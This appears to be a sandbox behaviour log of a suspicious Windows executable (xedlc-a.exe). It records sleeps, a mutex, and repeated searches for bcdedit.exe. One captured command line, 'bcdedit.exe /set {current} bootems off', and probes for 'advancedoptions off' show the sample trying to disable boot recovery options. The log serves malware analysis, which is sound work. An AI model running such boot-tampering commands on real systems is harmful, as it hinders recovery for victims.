- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 49934
- sequenceNumber: 252
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- apicall:
- timestamp: 49950
- sequenceNumber: 253
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0042207d
- params:
- param (id:1): 15
- mutex:
- timestamp: 49965
- sequenceNumber: 254
- value: \BaseNamedObjects\78456214324124
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 49970
- mode: failed
- sequenceNumber: 255
- value: C:\Documents and Settings\admin\Application Data\bcdedit.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 49976
- mode: failed
- sequenceNumber: 256
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 49987
- mode: failed
- sequenceNumber: 257
- value: C:\WINDOWS\system32\bcdedit.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 49992
- mode: failed
- sequenceNumber: 258
- value: C:\WINDOWS\system\bcdedit.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 49997
- mode: failed
- sequenceNumber: 259
- value: C:\WINDOWS\bcdedit.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50001
- mode: failed
- sequenceNumber: 260
- value: C:\WINDOWS\system32\wbem\bcdedit.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50005
- mode: failed
- sequenceNumber: 261
- value: C:\Program Files\QuickTime\QTSystem\bcdedit.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50010
- mode: failed
- sequenceNumber: 262
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\bcdedit.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50015
- mode: failed
- sequenceNumber: 263
- value: C:\Program Files\Debugging Tools for Windows (x86)\bcdedit.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000034
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50019
- mode: failed
- sequenceNumber: 264
- value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50024
- mode: failed
- sequenceNumber: 265
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50029
- mode: failed
- sequenceNumber: 266
- value: C:\WINDOWS\system32\BCDEDIT.EXE \SET.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50034
- mode: failed
- sequenceNumber: 267
- value: C:\WINDOWS\system\BCDEDIT.EXE \SET.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50038
- mode: failed
- sequenceNumber: 268
- value: C:\WINDOWS\BCDEDIT.EXE \SET.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50044
- mode: failed
- sequenceNumber: 269
- value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50050
- mode: failed
- sequenceNumber: 270
- value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50057
- mode: failed
- sequenceNumber: 271
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50062
- mode: failed
- sequenceNumber: 272
- value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50067
- mode: failed
- sequenceNumber: 273
- value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT}.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50072
- mode: failed
- sequenceNumber: 274
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current}.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50078
- mode: failed
- sequenceNumber: 275
- value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT}.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50083
- mode: failed
- sequenceNumber: 276
- value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT}.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50087
- mode: failed
- sequenceNumber: 277
- value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT}.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50094
- mode: failed
- sequenceNumber: 278
- value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT}.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50099
- mode: failed
- sequenceNumber: 279
- value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT}.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50104
- mode: failed
- sequenceNumber: 280
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT}.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50110
- mode: failed
- sequenceNumber: 281
- value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT}.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50115
- mode: failed
- sequenceNumber: 282
- value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50121
- mode: failed
- sequenceNumber: 283
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} bootems.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50126
- mode: failed
- sequenceNumber: 284
- value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50132
- mode: failed
- sequenceNumber: 285
- value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50137
- mode: failed
- sequenceNumber: 286
- value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50144
- mode: failed
- sequenceNumber: 287
- value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50149
- mode: failed
- sequenceNumber: 288
- value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50155
- mode: failed
- sequenceNumber: 289
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50161
- mode: failed
- sequenceNumber: 290
- value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50167
- mode: failed
- sequenceNumber: 291
- value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50173
- mode: failed
- sequenceNumber: 292
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} bootems off.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50178
- mode: failed
- sequenceNumber: 293
- value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50183
- mode: failed
- sequenceNumber: 294
- value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50189
- mode: failed
- sequenceNumber: 295
- value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50195
- mode: failed
- sequenceNumber: 296
- value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50201
- mode: failed
- sequenceNumber: 297
- value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- apicall:
- timestamp: 50205
- sequenceNumber: 298
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: dummy.dll
- apiname: ProcessCreate_Failure
- address: 0x7c81d627
- params:
- param (id:1): NULL
- param (id:2): bcdedit.exe /set {current} bootems off
- param (id:3): 32
- param (id:4): NULL
- apicall:
- timestamp: 50210
- sequenceNumber: 299
- processinfo:
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041dca8
- params:
- param (id:1): 1000
- file:
- timestamp: 50215
- mode: failed
- sequenceNumber: 300
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 50221
- mode: failed
- sequenceNumber: 301
- value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51222
- mode: failed
- sequenceNumber: 302
- value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51227
- mode: failed
- sequenceNumber: 303
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} advancedoptions.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51233
- mode: failed
- sequenceNumber: 304
- value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51239
- mode: failed
- sequenceNumber: 305
- value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51244
- mode: failed
- sequenceNumber: 306
- value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51274
- mode: failed
- sequenceNumber: 307
- value: C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51280
- mode: failed
- sequenceNumber: 308
- value: C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51285
- mode: failed
- sequenceNumber: 309
- value: C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51291
- mode: failed
- sequenceNumber: 310
- value: C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51297
- mode: failed
- sequenceNumber: 311
- value: C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51303
- mode: failed
- sequenceNumber: 312
- value: C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} advancedoptions off.exe
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51308
- mode: failed
- sequenceNumber: 313
- value: C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51313
- mode: failed
- sequenceNumber: 314
- value: C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51319
- mode: failed
- sequenceNumber: 315
- value: C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
- processinfo:
- tainted: true
- pid: 1056
- imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc000003a
- CreateOptions: 0x200000
- PE:
- InspectionType: Ext
- file:
- timestamp: 51327
- mode: failed
- sequenceNumber: 316
